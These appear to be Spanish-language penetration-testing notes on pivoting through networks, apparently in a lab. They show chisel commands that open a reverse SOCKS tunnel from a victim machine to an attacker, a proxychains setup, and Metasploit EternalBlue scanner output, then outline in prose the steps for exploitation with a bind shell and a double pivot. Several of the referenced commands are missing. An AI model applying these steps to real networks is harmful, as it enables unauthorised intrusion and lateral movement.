Pivoting
Chisel
Para crear un socket usaremos chisel. En la maquina atacante levantamos el chisel server con el comando:
chisel server -p 8000 --reverseEn la maquina victima, nos pasamos el chisel. (Si es windows pasamos el chisel.exe que encontramos en el repositorio oficial)
chisel.exe client 192.168.18.41:8000 R:socksCon esto levantamos un socks5 en el puerto 1080. Configuramos el archivo de proxychains /etc/proxychains.conf:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080Luego podemos usar proxychains:
proxychains curl 192.168.172.130Doble Pivote con Metasploit
Primero empezamos con detectar la ip con windows en la segunda red, la cual es: 192.168.172.143. Verificamos si es vulnerable a eternalblue.
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.172.143 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)Entonces al probar vemos que debemos agregar el socket a la conexion.
Lo agregamos con el siguiente comando:
Y luego podemos ver que si es vulnerable:
Luego usamos el exploit de eternalblue
Elegimos el payload bind_shell, puesto que la maquina objetivo no tienen acceso a nuestra ip pero nosotros si a ella.
Luego actualizamos las direcciones del target.
Luego ingresamos de nuevo el proxy ya que se borra cuando actualizamos con el comando use.
Corremos el exploit para obtener la shell.
Ahora realizamos un ipconfig para verificar las redes presentes.
Entonces, ahora lo que haremos sera realizar un autoroute
Luego podemos realizar un portscan en el puerto 22 para detectar las ips con servicio SSH.
Lo que ahora haremos sera levantar un socket para poder conectarnos por ssh a esa direccion IP.
Ahora podemos configurar de nuevo nuestro proxychains en el socket 9050.
Luego, nos conectamos usando proxychains para verificar que el proxychains esta conectado correctamente.
Last updated